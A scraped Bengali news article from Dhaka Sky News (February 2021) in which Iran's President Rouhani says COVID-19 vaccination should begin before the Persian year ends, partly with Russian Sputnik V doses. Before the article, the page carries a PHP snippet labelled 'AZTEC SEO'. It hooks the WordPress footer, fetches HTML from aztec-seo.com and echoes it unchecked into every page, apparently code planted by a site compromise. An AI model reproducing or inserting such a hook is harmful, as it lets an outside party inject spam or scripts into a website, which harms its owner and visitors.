/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); চলতি ফার্সি বছর শেষ হওয়ার আগেই ইরানে করোনা টিকা দেয়া শুরু হবে: রুহানি | Dhaka Sky News

মিয়ানমারে সামরিক অভ্যুত্থানে কেন উদ্বিগ্ন বিশ্ব ব্যাংক?

আগের সংবাদ

ইসরাইলের আরো একটি ড্রোন ভূপাতিত করল ফিলিস্তিনি যোদ্ধারা

পরের সংবাদ

চলতি ফার্সি বছর শেষ হওয়ার আগেই ইরানে করোনা টিকা দেয়া শুরু হবে: রুহানি

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: February 2, 2021 , 10:35 pm

ইসলামি প্রজাতন্ত্র ইরানের প্রেসিডেন্ট ড. হাসান রুহানি বলেছেন, চলতি ফার্সি বছর শেষ হওয়ার আগেই তার দেশে করোনাভাইরাসের টিকা দেয়া শুরু হবে বলে আশা করা হচ্ছে। আগামী ২০ মার্চ চলতি বছর শেষ হবে।

ড. রুহানি বলেন, যখনই ইরানে টিকাদান কর্মসূচি শুরু হবে ইনশাল্লাহ দ্রুত পরিস্থিতির উন্নতি হবে। আশা করা যায়, চলতি মাসের শেষ দিকে অর্থাৎ আগামী দুই সপ্তাহ পরে টিকা দেয়া শুরু হতে পারে। তিনি বলেন, প্রথমে মেডিক্যাল স্টাফ অর্থাৎ ডাক্তার ও নার্স এবং উচ্চমাত্রার ঝুঁকিপূর্ণ ব্যক্তিদের টিকা দেয়া হবে। এতে পরিস্থিতির ইনশাল্লাহ সম্পূর্ণ পরিবর্তন হবে এবং এরপর জনসাধারণকে টিকাদান কর্মসূচির আওতায় আনা হবে।

ইরানে তৈরি করোনা ভ্যাকসিন

প্রেসিডেন্ট রুহানি জানান, বিদেশ থেকে কয়েক মিলিয়ন ডোজ টিকা আনা হবে। এরপর আগামী গ্রীষ্ম থেকে আশা করা যায় দেশে উৎপাদিত টিকা বাজারে আসবে এবং জনগণ তা ব্যবহার করতে পারবেন।

ইরান এক কোটি ৬০ লাখ ৮০ হাজার ডোজ টিকা কিনবে। এছাড়া, রাশিয়া থেকে স্পুৎনিক ভি টিকাও কিনবে ইরান। পাশাপাশি রাশিয়ার সাথে যৌথভাবে এই টিকা উৎপাদনের পরিকল্পনা নিয়েছে তেহরান। সূত্র : পার্সটুডে